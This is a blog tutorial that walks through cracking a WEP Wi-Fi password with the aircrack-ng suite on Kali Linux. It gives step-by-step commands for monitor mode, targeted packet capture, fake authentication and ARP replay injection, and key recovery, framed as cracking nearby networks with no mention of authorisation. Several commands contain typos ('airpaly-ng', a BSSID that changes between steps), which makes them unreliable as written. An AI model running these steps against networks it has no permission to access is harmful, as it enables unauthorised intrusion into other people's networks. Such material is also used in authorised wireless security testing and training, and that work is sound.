Posted by 
Aircrack consists of many tools, such as aircrack-ng, airdecap-ng, airplay-ng, packetforge-ng, airodump and many others to crack the passwords of Wi-Fi networks around us.
Here we need to have Wi-Fi hardware that supports packet injection and monitor mode. List of some Wi-Fi we can use
- Alfa card by Alfa Networks
- TP-Link TL-WN821N
- Edimax EW-7811 UTC AC600
and so on.
In this tutorial we are going to use Alfa cards, usually, Alfa cards don’t need to install drivers on Kali Linux distro. Just plug and play.
Let’s start by checking whether our card has been detected by Kali Linux. To do that type following command in the terminal window:
airmon-ngThe screenshot of the command is the following:
Next, we need to set our Wi-Fi adapter (Alfa card in our case) to the monitor mode by applying the following command:
airmon-ng start wlan0monThe screenshot of the above command is the following:
Now we will check for Wi-Fi networks around us by using this command:
airodump-ng wlan0monThe screenshot of the preceding command is the following:
Then, we note the BSSID of the network we want to crack and the channel number. ESSId (name of Wi-Fi networks) will help us to do that.
In our case, we choose the BSSID B8:C1:A2:07:BC:F1 and the channel number is 9.
Then we stop the process by pressing Ctrl+C and leave the terminal window open.
Then we open another terminal window and capture the packets with -w switch to write these packets in a file by using the following command:
airodump-ng -w packets -c 9 --bssid B8:C1:A2:07:BC:F1 wlan0monThe screenshot is following:
Now we need to watch becons and data column, those numbers start from 0 and increase as the packets are passed between the router and other connected devices. We need a minimum 20,000 to crack the WEP (Wired Equivalent Privacy) password.
To become fast, we open another terminal window and run the following command to perform a fake authentication:
airpaly-ng -1 0 -e MGMNT -a BB:C1:A2:07:BC:F1 -h 00:c0:ca:57:cd:fc wlan0monAfter -e we need to type the AP ESSID and after -a we put AP MAC and after -h we have typed our MAC in the above command.
The screenshot is following:
Now we need to do the ARP packet replay using the following command:
airpaly-ng -3 -b BSSID wlan0monThe following screenshot is showing an example of the applied command:
Once we have enough packets saved in a cap file, we start aircrack-ng and give it the file name where we saved the packets(.cap file):
aircrack-ng filename.capThe following screenshot shows the output of the preceding command:
After cracked, we can see the password on the screen.
We need to capture as many packets as possible. Each data packets have an Initialization Vector (IV), which is 3 bytes in size, so we need to simply capture as many IV’s we can and then use Aircrack on them to crack the Password.
Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.
Spyboy blog 